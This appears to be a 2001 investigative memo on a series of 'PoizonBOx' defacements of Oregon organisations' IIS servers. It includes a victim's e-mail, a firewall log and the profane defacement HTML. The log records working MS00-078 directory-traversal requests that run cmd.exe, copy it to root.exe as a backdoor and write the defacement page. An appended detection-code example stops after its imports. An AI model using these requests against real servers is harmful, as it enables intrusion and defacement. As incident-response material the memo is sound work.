On May 7, 2001, [redacted], Port of Portland, 121 NW Everett, Portland, Oregon, Telephone [redacted], advised Portland that on May 3, 2001, a server, hosting their web page at IP address 207.109.34.83, www.portptld.com, had been compromised. Their web page was replaced with the following information:

fuck USA Government
fuck PoizonBOx
contact: sysadmcn@yahoo.com.cn


[redacted] indicated that the web site was running on a Microsoft web server with NT service pack 6. The server was exploited via a previously identified IIS vulnerability addressed by Microsoft in Security Bulletin MS00-078. The attack was logged to IP addresses 211.96.252.251, which resolves to China United Telecommunications Corporation, and 61.142.242.231, which resolves to China Telecom. [redacted] indicated that the IIS logs show that the changes to the web page had originated from the 211.96.252.251 IP address. About an hour later, the log picked up the other IP address, which was being used to verify the defacement. [redacted] found no evidence of the remaining network being compromised.

The compromised server was used by the Port of Portland employees to access their Internet e-mail. The server was not frequently used, and was not behind a firewall. It was running Network Associates CyberCop intrusion detection software; however, no alerts were given. [redacted] and his co-workers have spent approximately 12 hours on this matter. The server was patched with the appropriate hot fixes. All of the compromised files were moved to a desktop folder and provided to Portland, along with the IIS log, in the enclosed e-mail.


On May 7, 2001, [redacted], Multnomah County ISD, 4747 East Burnside, Portland, Oregon, Telephone (503) 988-3749 ext [redacted], advised Portland that on May 6, 2001, four servers in their Data Center had been compromised, resulting in their default web pages being overwritten. The servers were exploited via a previously identified IIS vulnerability addressed by CERT Advisory CA-2001-11, sadmind/IIS Worm. The worm exploits a buffer overflow vulnerability in Solaris systems. After compromising the Solaris system, the worm compromises the IIS systems through the vulnerability addressed in Security Bulletin MS00-078. The attack was logged to IP address 211.75.85.1, which resolves to Chunghwa Telecom Co., Taipei, Taiwan. [redacted] is continuing to work on assessing the damages to the network and will furnish results and logs to Portland when completed.


On May 8, 2001, [redacted], Union-Baker Education Service District, 10100 McAlister Road, Island City, Oregon, Telephone [redacted], advised Portland that from May 4th to May 6, 2001, two of their servers had been compromised, with their web page being replaced with the following information:

fuck USA Government
fuck PoizonBOx
contact: sysadmcn@yahoo.com.cn


Both IIS servers were running Windows NT 4.0 service pack 6A. One of the servers, an HP, was rebuilt as it was the server for a Novell database server. The other, a Dell PowerEdge, which hosts a special education database, has not been fully repaired. It has only had IIS reinstalled and the inetpub directory erased. Neither server was behind a firewall. Both servers are still off-line. To date, approximately $1,500 in labor costs have been associated with this hacking incident. The servers were compromised through a known vulnerability in IIS FTP. The hacker ran a command line which allowed them to remotely view the system and steal passwords. In researching the attack, [redacted] determined that a file, rit.exe, had been placed in the \Scripts directory. This file appeared to give the hacker backdoor access to the system. All of the passwords have since been changed. No other systems on the network appear to have been compromised. Logs from both servers were provided to Portland in the enclosed e-mail.


On May 10, 2001, [redacted], Corvallis Clinic, Corvallis, Oregon, Telephone (54[redacted]-1618 ext. [redacted], advised Portland that one of their servers named home.corvallis-clinic.com, IP Address 207.109.247.163, had been compromised. Their web page was replaced with the following information:

fuck USA Government
fuck PoizonBOx
contact: sysadmcn@yahoo.com.cn


The compromised IIS Web Server was running Windows NT 4.0 service pack 5, and was behind a Cisco PIX firewall. [redacted] indicated that the hacker used the backdoor.wlf and backdoor.nthack tools to compromise the server. Log files reflect that the attack originated from IP address 211.96.252.251, which resolves to China United Telecommunications Corporation, and 209.211.205.56, which resolves to LCI International, 4650 Lakehurst Court, Dublin, Ohio. [redacted] and his co-workers have spent approximately 2 ½ days on this matter assessing the damages and repairing the system. [redacted] also installed Norton Anti-Virus on the local machine.


[redacted] indicated that the server hosts the clinic's e-mail and Exchange server, and is also used for departmental shared files. The clinic has 80 doctors on staff and 40,000 active patients. [redacted] has not found any evidence of the doctor/patient information being compromised. [redacted] also has not found any other damage to the network outside of the defaced web pages.

[redacted] renamed all of the compromised files with a .back extension. [redacted] also made a copy of the registry files. [redacted] deleted the default and index .asp and .htm files, which contained the defaced web page. Copies of the compromised files and logs were provided to Portland in the enclosed e-mail.


On May 08, 2001, [redacted], Coffey Laboratories Inc., 12423 NE Whitaker Way, Portland, Oregon, Telephone (503) 254-1794, advised Portland that their server hosting the company's web site at www.coffeylabs.com, IP 192.168.1.10, had been compromised on May 7, 2001. Their web page was replaced with the following information:

fuck USA Government
fuck PoizonBOx
contact: sysadmcn@yahoo.com.cn


The compromised IIS server was running Windows NT 4.0 service pack 5. The server was outside of the company's internal network, and was used for its customers to log in and obtain scientific reports. No other damage was done to the server. The server was not behind a firewall and had no logs available. [redacted] estimated their damages at approximately two hours of labor spent repairing the system.

[redacted] stated that Coffey Labs also hosts a client, Grand European Tours (GET), on their network. GET also had their web page replaced with the same information that was left on the Coffey Labs server. [redacted] provided the GET IIS logs in the enclosed e-mail.


On May 3, 2001, [redacted], Clipper.net, 2295 Coburg Road, Eugene, Oregon, Telephone [redacted], advised Portland that one of their client's NT 4.0 servers, located in Newport, Oregon, had been compromised. The server hosted the web site for the Lincoln City Chamber of Commerce at www35.npt.clipper.net. The hacker replaced the Chamber of Commerce home page with one containing anti-American propaganda (see enclosure #12). [redacted] indicated that no other damage was done to Clipper.net's systems.
[redacted] of Clipper.net advised Portland that the compromised server had not yet been examined. Because the server is located in Newport, Oregon, [redacted] has not had an opportunity to travel there. [redacted] indicated that Clipper.net was recently purchased by Sonitrol Security System. As a result, they will no longer have servers outside of the Eugene facility. The compromised server in Newport will eventually be relocated to Eugene, and has not yet been repaired. [redacted] stated that when he has an opportunity to travel to Newport, he will examine the compromised system and provide any relevant data to Portland.


Portland is awaiting incident reports from other 
victims and will provide them to Chicago upon receipt. 




Sent: May 7, 2001 9:42 AM
To: [redacted]
Subject: Web Site Hack

Attachments: chilog.txt, default.asp, default.htm, index.asp, index.htm


Here is the data that we spoke about on Friday. The file chilog.txt contains the logs from our corporate firewall. The remaining files are the files that were created on our web server. Would appreciate any info that you could provide on this.

Best regards,

Sincerely,

[redacted]


Our Network topology is as follows:

Firewall - Axent Raptor 6.5 on NT4.0 platform, 3 NICs (Internet / Internal network / Service network)

Internal Network - NT4.0 domain

Service network - IIS4 webserver (corporate internet presence)

End


Details:

At approximately 12:40 PST May 4 2001, the Timber Products Company corporate website (207.109.247.150) was defaced with an anti-US government message. The web site was running on a Microsoft IIS4 web server with NT service pack 5 installed. The NT server had unneeded services disabled and used a nine character administrative password (alpha/numeric mix).

This attack was logged as originating from [redacted]. The APNIC database provides the following information on this IP address:


inetnum:  211.95.192.0 - 211.97.63.255
netname:  CNUNINET-GD
descr:    China United Telecommunications Corporation
country:  CN
admin-c:  RX9-AP
tech-c:   RX9-AP
mnt-by:   MAINT-CNNIC-AP
changed:  xry@bj.cnuninet.net 20010113
source:   APNIC

person:
address:  Avenue,
country:
phone:
e-mail:
nic-hdl:  RX9-AP
mnt-by:   MAINT-CNNIC-AP
changed:
source:   APNIC


The attack consisted of replacing default web site home pages with pages containing the anti-government messages. This attack was discovered the following morning and the web site was taken off-line. The web server was subsequently erased and rebuilt. Web site was again on-line and operational later that evening.

<<chilog.txt>> <<default.asp>> <<default.htm>> <<index.asp>> <<index.htm>>
chilog
May 04 00:40:55.774 quebec httpd[325]: 121 Statistics: duration=0.04 id=6uR84 sent=18 rcvd=137 srcif=Vpn6 src=211.96.252.251/50547 cldst=207.109.247.150/80 svsrc=10.96.0.1/5331 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=x result="400 Bad Request" proto=http rule=388
May 04 00:40:56.167 quebec httpd[325]: 121 Statistics: duration=0.03 id=6uR86 sent=66 rcvd=505 srcif=Vpn6 src=211.96.252.251/50598 cldst=207.109.247.150/80 svsrc=10.96.0.1/5332 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir result="200 OK" proto=http rule=388
May 04 00:40:56.608 quebec httpd[325]: 121 Statistics: duration=0.03 id=6uR88 sent=70 rcvd=598 srcif=Vpn6 src=211.96.252.251/50599 cldst=207.109.247.150/80 svsrc=10.96.0.1/5333 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+..\\ result="200 OK" proto=http rule=388
May 04 00:40:57.031 quebec httpd[325]: 121 Statistics: duration=0.05 id=6uR8a sent=100 rcvd=382 srcif=Vpn6 src=211.96.252.251/50600 cldst=207.109.247.150/80 svsrc=10.96.0.1/5334 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+\\winnt\\system32\\cmd.exe+root.exe result="502 Gateway Error" proto=http rule=388
May 04 00:40:57.476 quebec httpd[325]: 121 Statistics: duration=0.08 id=6uR8c sent=423 rcvd=355 srcif=Vpn6 src=211.96.252.251/50601 cldst=207.109.247.150/80 svsrc=10.96.0.1/5335 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/root.exe?/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22cen result="502 Gateway Error" proto=http rule=388
May 04 00:40:57.877 quebec httpd[325]: 121 Statistics: duration=0.04 id=6uR8e sent=423 rcvd=355 srcif=Vpn6 src=211.96.252.251/50653 cldst=207.109.247.150/80 svsrc=10.96.0.1/5336 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/root.exe?/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22cen result="502 Gateway Error" proto=http rule=388
May 04 00:40:58.268 quebec httpd[325]: 121 Statistics: duration=0.03 id=6uR8g sent=425 rcvd=355 srcif=Vpn6 src=211.96.252.251/50704 cldst=207.109.247.150/80 svsrc=10.96.0.1/5337 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/root.exe?/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22cen result="502 Gateway Error" proto=http rule=388
May 04 00:40:58.670 quebec httpd[325]: 121 Statistics: duration=0.03 id=6uR8i sent=425 rcvd=355 srcif=Vpn6 src=211.96.252.251/50755 cldst=207.109.247.150/80 svsrc=10.96.0.1/5338 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/root.exe?/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22cen result="502 Gateway Error" proto=http rule=388
May 04 00:40:59.068 quebec httpd[325]: 121 Statistics: duration=0.03 id=6uR8k sent=100 rcvd=382 srcif=Vpn6 src=211.96.252.251/50756 cldst=207.109.247.150/80 svsrc=10.96.0.1/5339 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+\\winnt\\system32\\cmd.exe+root.exe result="502 Gateway Error" proto=http rule=388
May 04 00:40:59.521 quebec httpd[325]: 121 Statistics: duration=0.08 id=6uR8m sent=424 rcvd=355 srcif=Vpn6 src=211.96.252.251/50757 cldst=207.109.247.150/80 svsrc=10.96.0.1/5340 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/root.exe?/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22cen result="502 Gateway Error" proto=http rule=388
May 04 00:40:59.928 quebec httpd[325]: 121 Statistics: duration=0.04 id=6uR8o sent=424 rcvd=355 srcif=Vpn6 src=211.96.252.251/50808 cldst=207.109.247.150/80 svsrc=10.96.0.1/5341 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/root.exe?/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22cen result="502 Gateway Error" proto=http rule=388
May 04 00:41:00.317 quebec httpd[325]: 121 Statistics: duration=0.03 id=6uR8q sent=426 rcvd=355 srcif=Vpn6 src=211.96.252.251/50809 cldst=207.109.247.150/80 svsrc=10.96.0.1/5342 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/root.exe?/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22cen result="502 Gateway Error" proto=http rule=388
May 04 00:41:00.710 quebec httpd[325]: 121 Statistics: duration=0.03 id=6uR8s sent=426 rcvd=355 srcif=Vpn6 src=211.96.252.251/50810 cldst=207.109.247.150/80 svsrc=10.96.0.1/5343 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/root.exe?/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22cen result="502 Gateway Error" proto=http rule=388
May 04 00:41:01.115 quebec httpd[325]: 121 Statistics: duration=0.03 id=6uR8u sent=100 rcvd=382 srcif=Vpn6 src=211.96.252.251/50861 cldst=207.109.247.150/80 svsrc=10.96.0.1/5344 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+\\winnt\\system32\\cmd.exe+root.exe result="502 Gateway Error" proto=http rule=388
May 04 00:41:01.561 quebec httpd[325]: 121 Statistics: duration=0.08 id=6uR8w sent=429 rcvd=355 srcif=Vpn6 src=211.96.252.251/50862 cldst=207.109.247.150/80 svsrc=10.96.0.1/5345 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/root.exe?/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22cen result="502 Gateway Error" proto=http rule=388
May 04 00:41:01.962 quebec httpd[325]: 121 Statistics: duration=0.04 id=6uR8y sent=429 rcvd=355 srcif=Vpn6 src=211.96.252.251/50863 cldst=207.109.247.150/80 svsrc=10.96.0.1/5346 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/root.exe?/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22cen result="502 Gateway Error" proto=http rule=388
May 04 00:41:02.357 quebec httpd[325]: 121 Statistics: duration=0.03 id=6uR8A sent=431 rcvd=355 srcif=Vpn6 src=211.96.252.251/50864 cldst=207.109.247.150/80 svsrc=10.96.0.1/5347 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/root.exe?/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22cen result="502 Gateway Error" proto=http rule=388
May 04 00:41:02.777 quebec httpd[325]: 121 Statistics: duration=0.03 id=6uR8C sent=431 rcvd=355 srcif=Vpn6 src=211.96.252.251/50865 cldst=207.109.247.150/80 svsrc=10.96.0.1/5348 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/root.exe?/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22cen result="502 Gateway Error" proto=http rule=388
May 04 00:41:03.174 quebec httpd[325]: 121 Statistics: duration=0.04 id=6uR8E sent=100 rcvd=382 srcif=Vpn6 src=211.96.252.251/50916 cldst=207.109.247.150/80 svsrc=10.96.0.1/5349 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+\\winnt\\system32\\cmd.exe+root.exe result="502 Gateway Error" proto=http rule=388
May 04 00:41:03.622 quebec httpd[325]: 121 Statistics: duration=0.08 id=6uR8G sent=432 rcvd=355 srcif=Vpn6 src=211.96.252.251/51021 cldst=207.109.247.150/80 svsrc=10.96.0.1/5350 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/root.exe?/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22cen result="502 Gateway Error" proto=http rule=388
May 04 00:41:04.024 quebec httpd[325]: 121 Statistics: duration=0.04 id=6uR8I sent=432 rcvd=355 srcif=Vpn6 src=211.96.252.251/51022 cldst=207.109.247.150/80 svsrc=10.96.0.1/5351 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/root.exe?/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22cen result="502 Gateway Error" proto=http rule=388
May 04 00:41:04.441 quebec httpd[325]: 121 Statistics: duration=0.05 id=6uR8K sent=434 rcvd=355 srcif=Vpn6 src=211.96.252.251/51023 cldst=207.109.247.150/80 svsrc=10.96.0.1/5352 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/root.exe?/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22cen result="502 Gateway Error" proto=http rule=388
May 04 00:41:04.835 quebec httpd[325]: 121 Statistics: duration=0.03 id=6uR8M sent=434 rcvd=355 srcif=Vpn6 src=211.96.252.251/51024 cldst=207.109.247.150/80 svsrc=10.96.0.1/5353 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/root.exe?/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22cen result="502 Gateway Error" proto=http rule=388
May 04 00:41:05.228 quebec httpd[325]: 121 Statistics: duration=0.03 id=6uR8O sent=100 rcvd=382 srcif=Vpn6 src=211.96.252.251/51075 cldst=207.109.247.150/80 svsrc=10.96.0.1/5354 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+\\winnt\\system32\\cmd.exe+root.exe result="502 Gateway Error" proto=http rule=388
May 04 00:41:05.675 quebec httpd[325]: 121 Statistics: duration=0.09 id=6uR8Q sent=429 rcvd=355 srcif=Vpn6 src=211.96.252.251/51076 cldst=207.109.247.150/80 svsrc=10.96.0.1/5355 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/root.exe?/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22cen result="502 Gateway Error" proto=http rule=388
May 04 00:41:06.079 quebec httpd[325]: 121 Statistics: duration=0.03 id=6uR8S sent=429 rcvd=355 srcif=Vpn6 src=211.96.252.251/51127 cldst=207.109.247.150/80 svsrc=10.96.0.1/5358 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/root.exe?/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22cen result="502 Gateway Error" proto=http rule=388
May 04 00:41:06.472 quebec httpd[325]: 121 Statistics: duration=0.03 id=6uR8U sent=431 rcvd=355 srcif=Vpn6 src=211.96.252.251/51128 cldst=207.109.247.150/80 svsrc=10.96.0.1/5359 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/root.exe?/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22cen result="502 Gateway Error" proto=http rule=388
May 04 00:41:06.880 quebec httpd[325]: 121 Statistics: duration=0.04 id=6uR8W sent=431 rcvd=355 srcif=Vpn6 src=211.96.252.251/51129 cldst=207.109.247.150/80 svsrc=10.96.0.1/5360 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/root.exe?/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22cen result="502 Gateway Error" proto=http rule=388
May 04 00:41:07.274 quebec httpd[325]: 121 Statistics: duration=0.03 id=6uR8Y sent=100 rcvd=382 srcif=Vpn6 src=211.96.252.251/51130 cldst=207.109.247.150/80 svsrc=10.96.0.1/5361 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+\\winnt\\system32\\cmd.exe+root.exe result="502 Gateway Error" proto=http rule=388
May 04 00:41:07.735 quebec httpd[325]: 121 Statistics: duration=0.09 id=6uR90 sent=429 rcvd=355 srcif=Vpn6 src=211.96.252.251/51131 cldst=207.109.247.150/80 svsrc=10.96.0.1/5362 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/root.exe?/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22cen result="502 Gateway Error" proto=http rule=388
May 04 00:41:08.141 quebec httpd[325]: 121 Statistics: duration=0.04 id=6uR92 sent=429 rcvd=355 srcif=Vpn6 src=211.96.252.251/51186 cldst=207.109.247.150/80 svsrc=10.96.0.1/5363 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/root.exe?/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22cen result="502 Gateway Error" proto=http rule=388
May 04 00:41:08.539 quebec httpd[325]: 121 Statistics: duration=0.03 id=6uR94 sent=431 rcvd=355 srcif=Vpn6 src=211.96.252.251/51287 cldst=207.109.247.150/80 svsrc=10.96.0.1/5364 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/root.exe?/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22cen result="502 Gateway Error" proto=http rule=388
May 04 00:41:08.934 quebec httpd[325]: 121 Statistics: duration=0.03 id=6uR96 sent=431 rcvd=355 srcif=Vpn6 src=211.96.252.251/51288 cldst=207.109.247.150/80 svsrc=10.96.0.1/5365 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/root.exe?/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22cen result="502 Gateway Error" proto=http rule=388
May 04 00:41:09.327 quebec httpd[325]: 121 Statistics: duration=0.03 id=6uR98 sent=78 rcvd=718 srcif=Vpn6 src=211.96.252.251/51289 cldst=207.109.247.150/80 svsrc=10.96.0.1/5366 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+..\\wwwroot\\ result="200 OK" proto=http rule=388
May 04 00:41:09.729 quebec httpd[325]: 121 Statistics: duration=0.03 id=6uR9a sent=100 rcvd=382 srcif=Vpn6 src=211.96.252.251/51290 cldst=207.109.247.150/80 svsrc=10.96.0.1/5367 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+\\winnt\\system32\\cmd.exe+root.exe result="502 Gateway Error" proto=http rule=388
May 04 00:41:10.167 quebec httpd[325]: 121 Statistics: duration=0.07 id=6uR9c sent=431 rcvd=355 srcif=Vpn6 src=211.96.252.251/51345 cldst=207.109.247.150/80 svsrc=10.96.0.1/5368 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/root.exe?/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22cen result="502 Gateway Error" proto=http rule=388
May 04 00:41:10.564 quebec httpd[325]: 121 Statistics: duration=0.04 id=6uR9e sent=431 rcvd=355 srcif=Vpn6 src=211.96.252.251/51346 cldst=207.109.247.150/80 svsrc=10.96.0.1/5369 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/root.exe?/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22cen result="502 Gateway Error" proto=http rule=388
May 04 00:41:10.959 quebec httpd[325]: 121 Statistics: duration=0.03 id=6uR9g sent=433 rcvd=355 srcif=Vpn6 src=211.96.252.251/51347 cldst=207.109.247.150/80 svsrc=10.96.0.1/5370 dstif=Vpn5 dst=10.96.0.5/80 op=GET arg=http://10.96.0.5/scripts/root.exe?/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22cen result="502 Gateway Error" proto=http rule=388
fuck USA Government
fuck PoizonBOx

contact: sysadmcn@yahoo.com.cn

<html><body bgcolor=black><br><br><br><br><br><br><table width=100%><td><p align="center"><font size=7 color=red>fuck USA Government</font><tr><td><p align="center"><font size=7 color=red>fuck PoizonBOx<tr><td><p align="center"><font size=4 color=red>contact: sysadmcn@yahoo.com.cn</html>
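Added example, not part of the memo or the enclosed e-mail: detection logic for the Raptor "httpd Statistics" log format of chilog.txt above, run over constructed sample lines modelled on it. It flags the MS00-078 overlong-UTF-8 traversal, cmd.exe/root.exe execution and the copy that staged root.exe, and decodes the echo argument back into the HTML fragment of the page above. The rule names, the function names and the benign 198.51.100.7 line are assumptions of this example.

```python
import re
from urllib.parse import unquote, unquote_to_bytes, urlsplit

# Constructed sample in the Raptor "httpd Statistics" format of chilog.txt:
# three entries modelled on the enclosed log plus one benign request from
# 198.51.100.7 (documentation address space, not an address from the log).
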